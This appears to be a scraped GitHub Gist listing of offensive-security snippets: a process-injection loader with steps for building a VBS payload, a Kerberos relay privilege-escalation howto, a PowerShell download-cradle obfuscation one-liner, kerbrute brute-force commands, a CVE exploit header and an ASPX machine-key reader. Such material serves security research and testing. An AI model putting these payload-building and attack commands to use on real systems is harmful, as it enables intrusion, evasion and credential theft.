tothi / DInjectQueuerAPC.cs

Last active November 26, 2024 17:57 — forked from jfmaes/DInjectQueuerAPC.cs

.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript

	/// Using with GadgetToJScript (e.g. for VBS payload):
	/// 1.) compile to DLL: c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:DInjectQueuerAPC.dll /r:System.Net.Http.dll DInjectQueuerAPC.cs
	/// 2.) generate VBS: GadgetToJScript.exe -w vbs -b -o DInjectQueuerAPC -a DInjectQueuerAPC.dll
	/// 3.) test: cscript.exe DInjectQueuerAPC.vbs

	using System;
	using System.Diagnostics;
	using System.IO;
	using System.Runtime.InteropServices;
	using System.Threading.Tasks;

rqu1 / checkmk.py

Last active December 27, 2025 08:27

check if a PAN firewall is using the default master key when globalprotect is enabled

	from hashlib import md5, sha1
	from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
	from cryptography.hazmat.backends import default_backend
	from base64 import b64encode, b64decode
	import sys, time
	import requests

	DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'

	class PanCrypt():

tothi / krbrelay_privesc_howto.md

Last active January 24, 2026 07:17

Privilege Escalation using KrbRelay and RBCD

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.

Prerequisites:

LDAP signing not required on Domain Controller (default!)

chr0ll0x0 / auto-subdomains.sh

Last active July 8, 2022 21:57

for subdomains

	#!/bin/bash

	#please install this tool first
	#install jq
	#Assetfinder - https://github.com/tomnomnom/assetfinder
	#Subfinder - https://github.com/projectdiscovery/subfinder
	#Amass - https://github.com/OWASP/Amass
	#Findomain https://github.com/Findomain/Findomain
	#Anew https://github.com/tomnomnom/anew
	#crobat https://github.com/cgboal/sonarsearch/crobat

Sicks3c / packages.sh

Last active March 4, 2021 17:15

	#!/bin/bash
	echo "Installing amass"
	export GO111MODULE=on; go get -v github.com/OWASP/Amass/v3/...
	echo "anew"
	bash -c 'go get -u github.com/tomnomnom/anew'
	echo -e "Installing anti-burl"
	bash -c 'go get -u github.com/tomnomnom/hacks'
	echo -e "Installing aquatone"
	bash -c 'go get -u github.com/michenriksen/aquatone'
	echo -e 'Installing assetfinder'

fisboger / WerArbitraryFileDelete.cs

Last active August 22, 2024 21:44

CVE-2020-1088

	using NtApiDotNet;
	using System;
	using System.Collections.Generic;
	using System.Diagnostics;
	using System.IO;
	using System.Linq;
	using System.Text;
	using System.Threading;
	using System.Threading.Tasks;

mgeeky / Download-Cradles-Oneliners.md

Last active March 2, 2026 13:50

Various Powershell Download Cradles purposed as one-liners

Download Cradles

0) Extra goodies

Obfuscated FromBase64String with -bxor nice for dynamic strings deobfuscation:

$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''

The same as above but for UTF-16 base64 encoded strings:

TarlogicSecurity / kerberos_attacks_cheatsheet.md

Created May 14, 2019 13:33

A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

irsdl / machineKeyFinder.aspx

Last active January 4, 2026 08:57

To find validation and decryption keys when AutoGenerate has been used in Machine Key settings

	<%@ Page Language="C#" %>
	<%
	// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/
	Response.Write("<br/><hr/>");
	byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{});
	if(autoGenKeyV4!=null)
	Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty));
	Response.Write("<br/>");
	byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{});
	if(autoGenKey!=null)

jhaddix / content_discovery_all.txt

Created May 26, 2018 11:51

a masterlist of content discovery URLs and files (used most commonly with gobuster)

This file has been truncated, but you can view the full file.

	`
	~/
	~
	×™×


	___
	__
	_

m3dsec m3dsec

KrbRelay with RBCD Privilege Escalation HOWTO

TL;DR

Download Cradles

0) Extra goodies

Kerberos cheatsheet

Bruteforcing